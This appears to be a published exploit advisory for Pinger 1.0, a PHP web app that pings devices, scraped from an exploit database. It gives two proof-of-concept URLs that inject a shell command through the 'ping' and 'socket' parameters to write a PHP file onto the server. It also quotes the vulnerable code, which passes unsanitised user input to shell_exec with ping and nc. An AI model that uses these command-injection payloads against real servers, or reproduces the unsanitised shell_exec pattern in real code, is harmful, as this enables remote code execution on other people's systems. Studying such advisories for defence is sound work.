Share
## https://sploitus.com/exploit?id=PACKETSTORM:157235
================================================================================  
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution  
================================================================================  
# Vendor Homepage: https://github.com/wcchandler/pinger  
# Software Link: https://github.com/wcchandler/pinger  
# Date: 2020.04.13  
# Author: Milad Karimi  
# Contact: miladgrayhat@gmail.com  
# Tested on: windows 10 , firefox  
# Version: 1.0  
# CVE : N/A  
================================================================================  
# Description:  
simple, easy to use jQuery frontend to php backend that pings various  
devices and changes colors from green to red depending on if device is  
up or down.  
  
# PoC :  
  
http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php  
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php  
  
  
# Vulnerabile code:  
  
if(isset($_GET['ping'])){  
// if this is ever noticably slower, i'll pass it stuff when called  
// change the good.xml to config.xml, good is what I use at $WORK  
$xml = simplexml_load_file("config.xml");  
//$xml = simplexml_load_file("good.xml");  
if($_GET['ping'] == ""){  
$host = "127.0.0.1";  
}else{  
$host = $_GET['ping'];  
}  
$out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout  
.' '.$host.' | grep received | awk \'{print $4}\''));  
$id = str_replace('.','_',$host);  
  
if(($out == "1") || ($out == "0")){  
echo json_encode(array("id"=>"h$id","res"=>"$out"));  
}else{  
## if it returns nothing, assume network is messed up  
echo json_encode(array("id"=>"h$id","res"=>"0"));  
}  
}  
  
if(isset($_GET['socket'])){  
$xml = simplexml_load_file("config.xml");  
//$xml = simplexml_load_file("good.xml");  
if($_GET['socket'] == ""){  
$host = "127.0.0.1 80";  
}else{  
$host = str_replace(':',' ',$_GET['socket']);  
}  
$out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');  
$id = str_replace('.','_',$host);  
$id = str_replace(' ','_',$id);  
if(preg_match("/succeeded/",$out)){  
echo json_encode(array("id"=>"h$id","res"=>"1"));  
}else{  
## if it returns nothing, assume network is messed up  
echo json_encode(array("id"=>"h$id","res"=>"0"));  
}  
}  
  
?>  
  
************************  
* ==> Contact Me :  
* Telegram : @Ex3ptionaL  
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com  
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i  
************************